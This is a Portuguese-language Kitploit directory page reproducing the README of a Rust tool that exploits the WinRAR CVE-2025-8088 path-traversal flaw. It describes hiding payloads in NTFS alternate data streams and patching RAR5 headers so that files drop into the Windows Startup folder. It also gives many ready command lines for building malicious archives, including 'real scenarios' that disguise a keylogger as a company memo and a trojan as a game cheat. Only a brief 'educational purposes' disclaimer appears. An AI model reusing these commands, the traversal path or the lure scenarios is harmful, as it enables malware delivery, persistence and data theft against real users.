Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Uma implementação de alto desempenho e com segurança de memória da ferramenta de exploit do WinRAR CVE-2025-8088, reescrita em Rust para melhor confiabilidade e desempenho. | Kitploit
Ferramentas/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Mecanismos de PersistênciaExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de PayloadsExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Uma implementação de alto desempenho e com segurança de memória da ferramenta de exploit do WinRAR CVE-2025-8088, reescrita em Rust para melhor confiabilidade e desempenho.

Ver Repositório
83há 11 mesesAinda não revisado

Ferramenta de Exploração WinRAR - Edição Rust

Ferramenta Avançada de Exploração de Path Traversal para WinRAR - Escrita em Rust

Uma implementação de alto desempenho e com segurança de memória da ferramenta de exploração da CVE-2025-8088 do WinRAR, reescrita em Rust para maior confiabilidade e desempenho.

Recursos

  • Exploração de ADS - NTFS Alternate Data Streams para ocultação de payload
  • Manipulação de Cabeçalhos RAR5 - Patch direto de cabeçalhos para injeção de caminho
  • GUI Moderna - Interface GTK elegante com estilização CSS
  • Direcionamento para Inicialização - Colocação automática do payload na inicialização do Windows
  • Suporte a Iscas Personalizadas - Use seus próprios arquivos de isca ou o padrão
  • Suporte Universal de Arquivos - Suporta qualquer tipo de arquivo tanto para payload quanto para isca
  • Tratamento Robusto de Erros - Verificação abrangente de erros e diagnósticos
  • Diagnósticos do Sistema - Verificação automática de compatibilidade do sistema
  • Eficiência de Memória - Baixo consumo de memória com gerenciamento inteligente de recursos

Requisitos

  • Rust 1.70+ - Toolchain Rust moderna
  • Bibliotecas de Desenvolvimento GTK - Para suporte à GUI
  • WinRAR CLI - Para criação de arquivos RAR
  • Windows 10/11 - Suporte a NTFS necessário

Início Rápido

1. Instalar o Rust

root@kitploit:~
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version

2. Instalar as Bibliotecas de Desenvolvimento GTK

Windows (MSVC)

root@kitploit:~
# Using vcpkg
vcpkg install gtk:x64-windows

Ou usando MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Clonar e Compilar

root@kitploit:~
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release

Uso

  1. Selecionar Payload - Escolha qualquer arquivo como payload (.exe, .bat, .jpg, .pdf, etc.)
  2. Escolher Isca - Selecione qualquer arquivo como isca (será criado um padrão se estiver vazio)
  3. Nomear o Arquivo - Insira o nome do arquivo RAR de saída
  4. Construir - Gere o arquivo de exploração

Exemplos

Uso Básico

Crie uma exploração simples com um payload e um arquivo de isca:

root@kitploit:~
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Uso Avançado

Múltiplos Arquivos de Isca

root@kitploit:~
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Diretório de Destino Personalizado

root@kitploit:~
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Diferentes Tipos de Payload

root@kitploit:~
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Diagnósticos do Sistema

root@kitploit:~
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools

Cenários Reais

Cenário 1: Ambiente Corporativo

root@kitploit:~
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Cenário 2: Comunidade Gamer

root@kitploit:~
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

A ferramenta cria arquivos RAR com path traversal usando:

  1. Criação de ADS - Oculta o payload em NTFS alternate data streams
  2. Construção do RAR - Cria o RAR base com ADS usando o WinRAR CLI
  3. Patch de Cabeçalho - Injeta o caminho de traversal nos cabeçalhos RAR5
  4. Recálculo de CRC - Garante a integridade do arquivo
  5. Saída - Entrega o RAR malicioso pronto para extração

Exemplo de Caminho: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Tipos de Arquivo Suportados

Arquivos de Payload:

  • ✅ Executáveis (.exe, .bat, .cmd)
  • ✅ Scripts (.py, .js, .vbs, .ps1)
  • ✅ Documentos (.pdf, .docx, .xlsx)
  • ✅ Imagens (.jpg, .png, .gif)
  • ✅ Vídeos (.mp4, .avi)
  • ✅ Áudio (.mp3, .wav)
  • ✅ Qualquer tipo de arquivo

Arquivos de Isca:

  • ✅ Arquivos de texto (.txt, .doc, .pdf)
  • ✅ Imagens (.jpg, .png, .gif, .bmp)
  • ✅ Vídeos (.mp4, .avi)
  • ✅ Áudio (.mp3, .wav)
  • ✅ Documentos (.docx, .xlsx)
  • ✅ Qualquer tipo de arquivo

Arquitetura

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file

Solução de Problemas

A ferramenta inclui diagnósticos automáticos que verificam:

  • ✅ Instalação do WinRAR CLI
  • ✅ Suporte a ADS NTFS
  • ✅ Permissões do diretório de inicialização
  • ✅ Disponibilidade das bibliotecas GTK
  • ✅ Compatibilidade do sistema de arquivos

Problemas Comuns:

  1. "GTK não encontrado"

    root@kitploit:~
    # Install GTK development libraries
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Or using MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "WinRAR CLI não encontrado"

    • Instale o WinRAR a partir de https://www.winrar.com
    • Certifique-se de que rar.exe esteja em Program Files
  3. "Não é possível gravar no diretório de inicialização"

    • Execute a ferramenta como Administrador
    • Verifique as permissões da pasta
  4. "ADS NTFS não suportado"

    • Certifique-se de estar usando o sistema de arquivos NTFS
    • ADS não é suportado em FAT32/exFAT
  5. Erros de Compilação

    root@kitploit:~
    # Update Rust toolchain
    rustup update
    
    # Clean and rebuild
    cargo clean
    cargo build --release
    

Formatação de Código

root@kitploit:~
# Format code
cargo fmt

# Lint code
cargo clippy

Dependências

As principais dependências incluem:

  • gtk - Framework GUI moderno
  • tokio - Runtime assíncrono
  • windows - Bindings da API do Windows
  • crc32fast - Cálculo rápido de CRC32
  • byteorder - Manipulação da ordem de bytes
  • anyhow - Tratamento de erros

Considerações de Segurança

  • Finalidade Educacional: Esta ferramenta é apenas para testes autorizados e fins educacionais
  • Ambiente Controlado: Use apenas em ambientes controlados com consentimento adequado
  • Conformidade Legal: Garanta a conformidade com as leis e regulamentos aplicáveis
  • Divulgação Responsável: Siga as práticas de divulgação responsável

Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

Autor

Feito por @kanonufo no Telegram


Ferramenta red team de alto desempenho para exploração da CVE-2025-8088 - Edição Rust

Baixar ferramenta